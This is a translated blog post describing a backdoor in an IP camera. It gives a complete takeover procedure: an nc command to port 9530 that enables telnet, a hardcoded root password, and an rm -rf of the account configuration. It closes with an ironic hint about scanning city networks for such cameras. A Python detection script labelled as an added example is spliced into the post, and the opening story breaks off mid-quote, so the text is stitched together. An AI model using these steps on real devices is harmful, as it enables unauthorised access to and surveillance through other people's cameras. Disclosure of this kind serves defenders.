You are Big Brother, or try yourself in the role of the all-seeing eye
A fairy tale
A gentleman bought a reliable cast-iron door with locks offering a gazillion combinations, but after installation the hinges began to creak. He called a specialist and sat in his kitchen, waiting and drinking tea, when the installer suddenly came to him and said in a human voice, "
Nonsense, you think, that only happens in fairy tales. And you would be fundamentally wrong.
In this post I will prove convincingly, and with examples, that such developers exist.
An IP camera from a country famous for the unique quality of its manufactured equipment somehow fell into my hands, with an unknown password. Googling how to reset the settings led me to a utility that resets this password, and the way it does so caught my interest.
Here is what was found on the camera initially.
Host is up (0.0014s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE
80/tcp    open  http
554/tcp   open  rtsp
8899/tcp  open  ospf-lite
9527/tcp  open  unknown
9530/tcp  open  unknown
34567/tcp open  unknown
The web interface is password protected. There is no CLI.
We start tcpdump, then start the password reset utility.
We see that the command \rOpenTelnet:OpenOnce is sent to TCP port 9530. After that, telnet opens on the device, and the program connects to port 23 and, using predefined passwords, resets the password-related configuration.
Let's try to do everything manually
1. Open telnet on the camera
nc 192.168.1.10 9530
\rOpenTelnet:OpenOnce
Check that it is open
nmap -p 1-65535 192.168.1.10
PORT      STATE SERVICE
23/tcp    open  telnet
80/tcp    open  http
554/tcp   open  rtsp
8899/tcp  open  ospf-lite
9527/tcp  open  unknown
9530/tcp  open  unknown
34567/tcp open  unknown
We log in with the standard password
telnet 192.168.1.10
Trying 192.168.1.10 ...
Connected to 192.168.1.10.
Escape character is '^]'.
LocalHost login: root
Password: xmhdipc
Welcome to Monitor Tech.
# rm -rf /mnt/mtd/Config/Account*
# reboot
# Connection closed by foreign host.
After rebooting, the camera is accessible via the web without a password. Enjoy it.
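The sequence captured above (a command sent to port 9530, then a telnet login to the same device) is straightforward to alert on. The following Python sketch is an added example, not part of the original post; the record layout, the sample data and the five-minute correlation window are assumptions.

```python
# Added example: correlate the port-9530 enable command with a later telnet login.
from datetime import datetime, timedelta

ENABLE_PORT = 9530              # port the reset utility talks to (from the post)
TELNET_PORT = 23
MARKER = b"OpenTelnet"          # command keyword seen in the capture
WINDOW = timedelta(minutes=5)   # assumed correlation window

# Constructed sample records: (timestamp, src, dst, dst_port, first payload bytes)
SAMPLE = [
    ("2024-01-01T10:00:00", "192.168.1.50", "192.168.1.10", 80, b"GET / HTTP/1.1\r\n"),
    ("2024-01-01T10:00:05", "192.168.1.50", "192.168.1.10", 9530, b"\rOpenTelnet:OpenOnce"),
    ("2024-01-01T10:00:09", "192.168.1.50", "192.168.1.10", 23, b""),
    ("2024-01-01T10:30:00", "192.168.1.77", "192.168.1.11", 9530, b"\x00\x01probe"),
    ("2024-01-01T11:00:00", "192.168.1.50", "192.168.1.12", 23, b""),
]

def detect(records, window=WINDOW):
    """Return alerts for enable commands and for telnet logins that follow them."""
    enabled = {}   # device address -> time the enable command was last seen
    alerts = []
    for ts, src, dst, port, payload in sorted(records):
        when = datetime.fromisoformat(ts)
        if port == ENABLE_PORT and MARKER in payload:
            enabled[dst] = when
            alerts.append(("telnet-enable", src, dst, ts))
        elif port == TELNET_PORT and dst in enabled:
            # Only a login shortly after the enable command is correlated.
            if when - enabled[dst] <= window:
                alerts.append(("telnet-after-enable", src, dst, ts))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(*alert)
```

In practice the records would come from a flow or packet log on the camera network segment; blocking ports 9530 and 23 at the segment boundary removes the need to rely on the alert alone.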
What guides the equipment manufacturer when it leaves such holes is not clear to me personally.
Dear readers, never scan the network of the city you would like to observe for open port 9530, and do not perform the actions described above; this may lead to a desire to go on vacation or go on a trip.